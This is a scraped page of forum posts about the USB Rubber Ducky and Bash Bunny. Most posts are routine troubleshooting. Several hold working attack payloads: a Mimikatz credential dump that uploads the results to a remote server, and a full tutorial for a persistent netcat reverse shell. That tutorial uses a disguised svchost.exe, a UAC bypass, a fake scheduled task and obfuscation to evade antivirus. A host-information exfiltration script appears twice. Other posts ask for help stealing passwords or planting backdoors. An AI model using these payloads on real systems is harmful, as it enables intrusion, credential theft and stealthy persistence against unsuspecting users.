Search the Community

In Android env, I want to go to the previous screen. I tried `ESCAPE` and `BACKSPACE` but was not successful. Other commands such as DOWNARROW and ENTER work correctly. The screen is in About device (in the Settings) and I want to go one screen back.

Hello. I have some question to Bashbunny first. Where can I watch or learn bashbunny script? second. What is difference with rubber ducky? Is that a "network rubber ducky"?

so i got my usb rubberducky in the mail, and upon watching the instructionals on youtube i have to say im at a complete loss of wtf to do. im new to all this. ive tried downloading the duckencoder but the .jar file cant be opened. i also downloaded DuckyScript UDL, Duck Firmware.hex, and notepad ++. still im stumped. please help!

Greetings, I have been toying around with my Rubber Ducky for a couple days now and I have been doing some tests on Windows 10 64bit mostly. I am currently running twinduck version: c_duck_v2_S002. I was ideally looking for a payload that would use mimikatz to extract the windows password from the current user and save it onto the ducky itself but none have worked yet. I also tried out the web server method with a local hosted apache2 web server(replacing the x's with my actual local hosted address): DELAY 1000 REM Open an admin command prompt GUI r DELAY 500 STRING powershell Start-Process cmd -Verb runAs ENTER DELAY 2000 ALT y DELAY 1000 REM Obfuscate the command prompt STRING mode con:cols=18 lines=1 ENTER STRING color FE ENTER REM Download and execute Invoke Mimikatz then upload the results STRING powershell "IEX (New-Object Net.WebClient).DownloadString('192.xxx.x.xx/im.ps1'); $output = Invoke-Mimikatz -DumpCreds; (New-Object Net.WebClient).UploadString('192.xxx.x.xx/rx.php', $output)" ENTER DELAY 15000 REM Clear the Run history and exit STRING powershell "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue" ENTER STRING exit ENTER I can access both the files from the targeted system with my browser so the web server is working fine. I am listening with netcat but never receives the data?? With: 'nc -l -p 80'. What am I doing wrong here?

Does anybody know how and if it is possible to open the Bios with the Rubberducky. I tried it with a script that just spams F1 and also with a script that presses F1 every half second. None of those worked. If i go into the bios mannually and then plug in the Rubber Ducky the script executes without a Problem.

Got my rubber ducky today in the mail. Messed around with it for 30 minutes until I was taking the adapter out of my pc to put it away and the micro sd card flew out of it . I spent roughly 2 hours looking for it on my carpet floor before I gave up. I'm going to buy a replacement. What should I be looking for? I'm just nervous I spend 5 dollars on a 2gb micro sd just to return it. Thanks

Link to my original reddit post So how do we create such reverse shell? Well, first of all you need to download netcat 1.12 and extract the nc64.exe. Once you got it extracted upload it to some file-hosting service of your choice, which provides DIRECT LINK (very important!!). I used Discord, works like charm and link doesn't expire. Second, you need to make yourself an .XML file which you're gonna need later for Task Scheduler. I believe scheduled tasks are rly good way to set up persistence, as well as escelating the file that it executes to NT Authority\SYSTEM privileges, while remaining stealthy. I already did the work for you. This is what it should look like. Just modify the arguments in the bottom to your IP/PORT. Once you got that done, save it and upload it for DIRECT LINK, just like you uploaded your previous file. Now, that the boring setup part is over, we get to the actual code that's being executed to achieve this type of shell: cd $env:public $url1="YOUR_NC64_LINK" $url2="YOUR_XML_LINK" $path1="$env:public\svchost.exe" $path2="$env:public\x.xml" (new-object net.webclient).downloadfile($url1,$path1) (new-object net.webclient).downloadfile($url2,$path2) cmd /r 'reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" /va /f&reg add "HKCU\Environment" /v "windir" /d "%comspec% /r mode 18,1&cd %public%&schtasks /create /tn \"Windows Update Assistant\" /f /xml x.xml >nul&schtasks /run /tn \"Windows Update Assistant\" /i >nul&REM "&timeout /t 1&schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I >nul&timeout /t 1&reg delete "HKCU\Environment" /v "windir" /F&attrib +s +h svchost.exe&del /q x.xml' So first, it downloads both of your files via powershell, then it clears our Windows + R history to clear any traces of itself (if you're using USB RubberDucky). Then it uses this UAC bypass technique to create scheduled task called Windows Update Assistant, which is set to be executed to run with NT Authority\SYSTEM privileges in our .XML file. Then it marks our nc64.exe file as hidden system file, which is also now called svchost.exe and then it deletes our .XML file, since system doesn't need it anymore after task is created. Now you're probably thinking, this is all nice, but how the fk do I run this in one-line of code? Very simple, by invoking expression called DownloadString in powershell like this: powershell -nop -w 1 -c "iex (new-object net.webclient).downloadstring('YOUR_PASTEBIN')" But problem with this one-liner is, that it gets picked up by most AVs as "malicious activity". Therefore, we need to obfuscate it a bit: cmd.exe /c powershell -nop -w 1 -c "iex (.('ne'+'w-ob'+'ject') ('ne'+'t.webc'+'lient')).('do'+'wnloadstr'+'ing').invoke(('Y'+'OUR_'+'PASTEBIN'))" And there it is, this one liner will get you persistent reverse shell which will check for itself every minute if it's running and if it's not, then it executes itself silently in the background.

Alright, so a friend gave me a USB hardware keylogger... the catch is that he doesn't remember the PIN. It's completely useless without the PIN since you need it to read stored keystrokes. So my idea is to use a rubber ducky to brute force in. The issue is that I'm not a programmer, and typing out every combination is not really worth it. So i was hoping that someone with some programming know how could send me a script, or a program to generate it. The keylogger PIN uses 3 digits, A-Z and 0-9 It works like a modifier key (Shift, Ctrl, Alt) so if the PIN was "ABC" then you would need to hold "A" then hold "B" then press "C" and release. Thanks to anyone who helps 😊

Can i run a payload(meterpreter)(metasploit) on android with rubber ducky or bash bunny over (wan)

When I plug my 64GB SDXC micro SD card formatted with the ex-fat format into the USB rubber ducky and then plug the Ducky into a computer, the led lit up red indicating an error I can verify that the micro SD card is inserted properly and is readable through an SD card reader leading me to believe that the USB rubber ducky is not compatible with SDXC Can anyone else verify ? And if i have to buy a replacement micro SD card what specs are required for optimal performance (size and type: SDHC, SDXC,SD-Card) ?

I just got my rubber ducky, the script works like it should when it arrives, but when I put the Micro SD card in the adapter so I can edit the code it doesn't show up, there is a beep from windows saying a new usb drive is in the computer but there is nothing in 'This PC'.

I just tried many of your products all used as mentioned in all your video’s and forums. Not one of all the products I bought from hak5 is working properly. it is doing nothing at all. Me on the other hand am busy all day with factory resetting and new configuration. i mean all of them. Really im a totally not satisfied customer and I wonder if you are able to get any of your products to work as you show us. i wonder if there is a totally satisfied customer at all. All the explanations in your video’s and books, just do not make the cut. your a not clear in the books. Explain it to us if we a kids of 7 year old and don’t leave information behind. Ever seen your own forums. There are so many questions the same. I think you have to get your act together. Besides that is your service getting real bad

Hi there, Can I use teensy 2++ to use BadUSB exploit like a rubber ducky ?

Wrote a ducky script to capture Computer Name, Username, IP address and Current Time stamp through a Powershell script. Never works the way I want after encoding it and using the BIN file. The RUN window never opens and nor does notepad. It randomly opens some excel file on the desktop and writes the STRING values there. The powershell commands at the end of the script seem to executed fine in the RUN window, but since the PS1 file is never created using notepad, they are useless. I feel it might have to do something with the encoding - I've tried GB and US (my keyboard layout is US). I have verified that the powershell script works otherwise. For encoding, I have tried both - encoder on DUCKTOOLKIT site as well as the local JAR encoder. I have also tried with all DELAYs more than 1000. Need help in figuring out what's going wrong? NOTE: the username, password and server were replaced with correct values in the actual script. Successfully verified the PS script. Ducky Script - DELAY 500 GUI R DELAY 500 STRING notepad DELAY 500 ENTER DELAY 1000 STRING $username = $env:username ENTER STRING $computername = $env:computername ENTER STRING $ipaddress = ([System.Net.DNS]::GetHostAddresses($env:computername) | Where-Object {$_.AddressFamily -eq "InterNetwork"} | select-object IPAddressToString)[0].IPAddressToString ENTER STRING $timestamp = (get-date).ToString('d-M-y HH:mm:ss') ENTER STRING $File = "C:\Users\$username\$computername.txt" ENTER STRING "Computername: $computername" >> $File ENTER STRING "Username: $username" >> $File ENTER STRING "IP-Address: $ipaddress" >> $File ENTER STRING "Time: $timestamp" >> $File ENTER STRING "`n" >> $File ENTER STRING $ftp = "ftp://username:password@server/Ducky/$computername.txt" ENTER STRING $webclient = New-Object System.Net.WebClient ENTER STRING $uri = New-Object System.Uri($ftp) ENTER STRING $webclient.UploadFile($uri, $File) ENTER STRING $wshell = New-Object -ComObject Wscript.Shell ENTER STRING $wshell.Popup("Bazinga",0,"OOPS",0x1) DELAY 3000 CTRL s DELAY 1000 STRING %TEMP%\cache.ps1 TAB DELAY 1000 DOWNARROW DOWNARROW DELAY 2000 ENTER ALT s DELAY 1000 ALT F4 DELAY 1000 GUI r DELAY 500 STRING powershell Start-Process cmd -Verb runAs ENTER DELAY 500 ALT y DELAY 500 STRING powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false ENTER DELAY 500 STRING powershell.exe -windowstyle hidden -File %TEMP%\cache.ps1 ENTER

Is there any sort of website or something that can help get me more familiar with terms in the coding/hacking world? Thank you.

Hi, I'm trying to use a ducky to automate some stuff on a macbook :-) But it has this funky Azerty layout (see image). I encoded it with "-l resources/be.properties" and that worked fine, except for one character: the at-sign "@", this renders as "ë". So I was thinking, maybe I should create a properties-file for this keyboard layout. But how do I do this? Any thoughts?

So I got a rubber ducky 4 days ago and I been looking at all the YouTube videos but none them explain it well they all go straight to coding instead telling me what to download and what tools I need. I want to be able to steal passwords etc the computer login pass I saw that on YouTube. The is one when you can do a RAT? To control someone screen or view ther file. The also one where it saves passwords and emails it to yourself. Just want to be able to complete something that actually works not the 'hello world'. Like this script (what does it do and how can I make it work) https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload-Netcat-Reverse-Shell I really want to try this one too https://www.hak5.org/blog/15-second-password-hack-mr-robot-style So yeah just need help with it like step by step what I need to install or setup!

Sometimes I have issues with Q LEFT/QUACK LEFTARROW when running scripts. Even by increasing the DELAYs I'll sometimes find the script hitting ENTER on 'no'. It's not the worst problem in the world, as I just press the left arrow myself, but it's more ideal for the script to do the whole job. Anyone else have this issue and know a solution?

I'm having trouble writing a powershell script that will 'exit' the terminal after running the code. This problem occurs when using a Quack script on the Bash Bunny. Here's the end part of the Ducky script into that I wrote: I pretty sure that's correct, and it should exit after deleting a file called ip.txt However, no such luck. What I have tried to solve the problem: STRING EXIT STRING Exit STRING exit; STRING del ip.txt; exit; But, no of these make a difference. I even checked a Ducky script written by DarrenHak5 who has the same way of exiting the powershell terminal. So, I can't understand why it's not working for me. If I manually type exit it will do so, if the HID type it, it will not exit. Guys, do you have any suggestions? Thanks

Wrote a ducky script to capture Computer Name, Username, IP address and Current Time stamp through a Powershell script. Never works the way I want after encoding it and using the BIN file. The RUN window never opens and nor does notepad. It randomly opens some excel file on the desktop and writes the STRING values there. The powershell commands at the end of the script seem to executed fine in the RUN window, but since the PS1 file is never created using notepad, they are useless. I feel it might have to do something with the encoding - I've tried GB and US (my keyboard layout is US). I have verified that the powershell script works otherwise. For encoding, I have tried both - encoder on DUCKTOOLKIT site as well as the local JAR encoder. I have also tried with all DELAYs more than 1000. Need help in figuring out what's going wrong? NOTE: the username, password and server were replaced with correct values in the actual script. Successfully verified the PS script. Ducky Script - DELAY 500 GUI R DELAY 500 STRING notepad DELAY 500 ENTER DELAY 1000 STRING $username = $env:username ENTER STRING $computername = $env:computername ENTER STRING $ipaddress = ([System.Net.DNS]::GetHostAddresses($env:computername) | Where-Object {$_.AddressFamily -eq "InterNetwork"} | select-object IPAddressToString)[0].IPAddressToString ENTER STRING $timestamp = (get-date).ToString('d-M-y HH:mm:ss') ENTER STRING $File = "C:\Users\$username\$computername.txt" ENTER STRING "Computername: $computername" >> $File ENTER STRING "Username: $username" >> $File ENTER STRING "IP-Address: $ipaddress" >> $File ENTER STRING "Time: $timestamp" >> $File ENTER STRING "`n" >> $File ENTER STRING $ftp = "ftp://username:password@server/Ducky/$computername.txt" ENTER STRING $webclient = New-Object System.Net.WebClient ENTER STRING $uri = New-Object System.Uri($ftp) ENTER STRING $webclient.UploadFile($uri, $File) ENTER STRING $wshell = New-Object -ComObject Wscript.Shell ENTER STRING $wshell.Popup("Bazinga",0,"OOPS",0x1) DELAY 3000 CTRL s DELAY 1000 STRING %TEMP%\cache.ps1 TAB DELAY 1000 DOWNARROW DOWNARROW DELAY 2000 ENTER ALT s DELAY 1000 ALT F4 DELAY 1000 GUI r DELAY 500 STRING powershell Start-Process cmd -Verb runAs ENTER DELAY 500 ALT y DELAY 500 STRING powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false ENTER DELAY 500 STRING powershell.exe -windowstyle hidden -File %TEMP%\cache.ps1 ENTER

Hey guys! I'm debating over weather to get the USB Rubber Ducky or the Bash Bunny. My objective is to be able to create a permanent back door to windows computers. As another note, can the Bash Bunny function as well as a Rubber Duck (using duckyscript as well) other than the 7 sec startup? Thanks in advance!

I've been trying to encode my USB Rubber Ducky on my Mac Desktop, and I can't figure out how! Please help, I can't wait to use it! Also, there was another USB that came in the package with the Rubber Ducky, what is this for? Thanks, Luke

Hi everybody One of the largest and well known Enterprise Security Conferences in Germany is C-Forge, run by Virtual Forge, a large Security Software Company. C-FORGE, May 30 + 31st 2017 , Heidelberg, Germany It is all centered around the (in)famous SAP ERP Software, used by almost all medium and large companies in the world. Since I am a professional pen tester for large SAP systems, I was asked to held a presentation. Everybody liked the proposal of a one-hour presentation of my Hak5-Backpack, with RubberDucky, LANTurtle, BashBunny, of course Pineapple TETRA and a great german product called miniChameleon, which copies and mimics RFID and NFC Cards (like hotel keys and corporate badges) . This will be a rundown about a SAP PenTest playbook scenario (with live elements) to get passwords and hashes with these devices. My experience is, that HW-attacks are often overlooked in Enterprises, but are much more risky, dangerous and overall much more likely than any network hack. So if you happened to be in the area, stop by. It is of no cost, if you are working for a SAP-customer. Check my presentation link and more conference information: C-Forge Presentation "Cracking the SAP Perimeter"

I just got the usb rubber ducky in the mail and trying to flash twinduck, but cant get the usb rubber ducky in dfu mode ive tried everything, holding it before putting it in the laptop nothing is working, and seems like this forum is the only place to get support for this, unless someone knows how to get ahold of the people who makes it

Im kind interested is it possible to use USB rubber ducky on IOT devices like router, modem , servers ?